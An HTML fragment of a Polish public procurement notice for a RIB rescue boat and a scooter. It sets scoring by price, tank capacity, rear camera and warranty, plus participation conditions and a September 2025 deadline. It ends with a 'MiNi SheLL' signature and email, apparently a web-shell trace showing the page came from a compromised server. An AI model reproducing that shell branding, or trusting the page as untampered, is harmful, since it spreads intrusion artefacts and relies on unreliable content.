class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przyjmie do szczegółowego rozpatrywania oferty niepodlegające odrzuceniu.<br/>2. Stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców<br/>w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną<br/>punktację: punktacja 0-100 (100% = 100 pkt). Zamawiający zastosuje zaokrąglenie wszystkich wyników do dwóch miejsc po przecinku.<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert: <br/>- Cena brutto - 60 %<br/>- Parametry techniczne – 20 % (w tym za pojemność zbiornika 10% oraz za wyposażenie<br/>skutera w szerokokątną kamerę wsteczną 10 %)<br/>- Gwarancja - 20 %<br/>Ocenie w oparciu o ww. kryteria oceny ofert poddawane są wyłącznie oferty niepodlegające odrzuceniu.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta przedstawi najkorzystniejszy bilans<br/>kryteriów oceny ofert określony w niniejszym przetargu, wyliczonych zgodnie ze wzorem:<br/>Lp = Lc + Lt + Lg<br/>gdzie:<br/>Lp - łączna ilość punktów przyznanych ofercie<br/>Lc - ilość punktów przyznana badanej ofercie za kryterium „cena”<br/>Lt - ilość punktów przyznana badanej ofercie za kryterium „parametry techniczne”<br/>Lg - ilość punktów przyznana badanej ofercie za kryterium „gwarancja”<br/>1) Punktacja za kryterium „Cena” – 60%, będzie wyliczana wg poniższego wzoru. Maksymalna liczba punktów przyznanych Wykonawcy wynosi 60.<br/>Lc = Cn/Cbad x 60<br/>gdzie:<br/>Lc - ilość punktów oferty badanej w kryterium cena<br/>Cn - najniższa cena (brutto) spośród złożonych ofert<br/>Cbad - cena (brutto) w ofercie badanej<br/>2.2) Punktacja za kryterium „Parametry techniczne” - 20%, będzie wyliczana wg zasady:<br/>Zamawiający przyzna ilość punktów w kryterium „parametry techniczne” w oparciu o informacje zawarte w przedłożonym przez wykonawcę wypełnionym załączniku 2.2 do SWZ. Maksymalna liczba punktów<br/>przyznanych wykonawcy wynosi 20. Ilość punktów w kryterium parametry techniczne [L t] będzie sumą ppkt a) i b) według wzoru:<br/>Lt = Lpz + Lk<br/>a) pojemność zbiornika paliwa [L pz ] – max. 10 pkt:<br/>0 pkt - jeżeli wykonawca zaoferuje pojemność zbiornika paliwa min. 50 l do 60 l włącznie<br/>5 pkt - jeżeli wykonawca zaoferuje pojemność zbiornika paliwa powyżej 60 l do 70 l włącznie<br/>10 pkt - jeżeli wykonawca zaoferuje pojemność zbiornika paliwa powyżej 70 l do 80 l włącznie.<br/>W przypadku niepodania w formularzu oferty lub podania przez Wykonawcę pojemność zbiornika paliwa wynoszącą więcej niż 80 l lub mniej niż 50 l jego oferta zostanie odrzucona.<br/>b) Szerokokątna kamera wsteczna [L k] – max. 10 pkt:<br/>0 pkt - jeżeli wykonawca zaoferuje skuter bez szerokokątnej kamery wstecznej,<br/>10 pkt - jeżeli wykonawca zaoferuje skuter wyposażony w szerokokątną kamerę wsteczną.<br/>2.3) Punktacja za kryterium „Gwarancja” będzie wyliczana wg zasady:<br/>0 pkt - za udzielenie gwarancji, rękojmi na minimalny okres 24 miesięcy,<br/>10 pkt - za udzielenie gwarancji, rękojmi na okres 36 miesięcy,<br/>20 pkt - za udzielenie gwarancji, rękojmi na okres 48 miesięcy.<br/>Minimalny okres gwarancji i rękojmi wynosi 24 miesiące od daty odbioru. W formularzu oferty należy podać oferowany okres gwarancji, rękojmi. W przypadku braku wskazania okresu gwarancji, rękojmi w formularzu oferty, Zamawiający przyjmie do oceny okres 24 miesięcy przyznając Wykonawcy 0 pkt. W przypadku zaoferowania gwarancji i rękojmi dłuższej niż 48 miesięcy Zamawiający przyzna w ramach tego kryterium 20 pkt., ale do umowy zostanie wpisana zaoferowana długość gwarancji i rękojmi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu określa się tylko i wyłącznie dla części Nr 1 zamówienia:<br/>1)	Zdolność techniczna lub zawodowa.<br/>Warunek ten, w zakresie doświadczenia zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał należycie, minimum jedną dostawę łodzi ratowniczej RIB, o wartości co najmniej 400.000,00 zł brutto.<br/>Uwaga <br/>Do przeliczenia na PLN wartości wskazanej w dokumentach złożonych na potwierdzenie spełniania warunków udziału w postępowaniu wyrażonej w walutach innych niż PLN, Zamawiający przyjmie średni kurs publikowany przez Narodowy Bank Polski z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu kursu nie ogłoszono, do ww. przeliczenia zastosowany będzie ostatni ogłoszony kurs przed tym dniem.<br/>Dla części Nr 2 zamówienia Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca jest zobowiązany wykazać w sposób szczególny. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Za równo dla części Nr 1 i części Nr 2 zamówienia Wykonawca na potwierdzenie niepodleganiu wykluczeniu składa oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wzór stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Warunek udziału w postępowaniu stawiany jest tylko i wyłącznie dla części Nr 1 zamówienia:<br/>Wykonawca na potwierdzenie warunku udziału w postępowaniu składa wykaz wykonanych dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, wraz z dowodami, że wykazane dostawy zostały wykonane należycie. Dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane (wzór<br/>stanowi załącznik nr 6 do SWZ). Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać ww. dokumentów –<br/>oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wykonawca wraz z ofertą składa przedmiotowy środek dowodowy, tj. wypełniony opis przedmiotu zamówienia – zestawienie minimalne wymagań jakie winien spełniać przedmiot zamówienia stanowiący załącznik Nr 2.1 lub 2.2 do SWZ (odpowiednio do części, o którą ubiega się wykonawca).<br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków, o których mowa w ust. 1 lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenie lub uzupełnienia w wyznaczonym terminie. <br/>3.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opis przedmiotu zamówienia – zestawienie minimalne wymagań jakie winien spełniać przedmiot zamówienia stanowiący załącznik Nr 2.1 lub 2.2 do SWZ (odpowiednio do części, o którą ubiega się wykonawca). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictwo upoważniające do złożenia oferty – (o ile ofertę składa pełnomocnik). Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego,<br/>2) pełnomocnictwo do reprezentowania w postępowaniu (dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia). W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy<br/>spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum,<br/>3) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>2)	Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną (-e) do jego udzielenia, tj. zgodnie z formą reprezentacji każdego z wykonawców.<br/>3)	Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>3.1) postępowania o zamówienie publiczne, którego dotyczą,<br/>3.2) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>3.3) ustanowionego pełnomocnika oraz zakresu jego umocowania. <br/>4)	Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z pełnomocnikiem.<br/>5)	W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/>6)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7)	Wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (oświadczenie składa się na formularzu oferty).<br/>8)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, spełnienie co najmniej dwóch odrębnych warunków udziału w postępowaniu wykonawcy mogą wykazać łącznie, chyba że SWZ stanowi inaczej. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazuje brak podstaw wykluczenia (jeżeli dotyczy).<br/>9)	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający będzie żądał przed zawarciem umowy przedstawienia umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, w zakresie i na warunkach określonych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załączniki nr 3.1 i 3.2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-f1d36b80-8e56-4e3f-9b9e-9ab821668f19</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-09 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie wymaga i nie dopuszcza składania ofert wariantowych.<br/>2. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>3. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy.<br/>4. Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>5. Zamawiający nie przewiduje aukcji elektronicznej.<br/>6. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>7. Zamawiający nie przewiduje stosowania wymagań, o których mowa w art. 94 oraz 96 ust. 2 pkt 2.

Creat By MiNi SheLL
Email: jattceo@gmail.com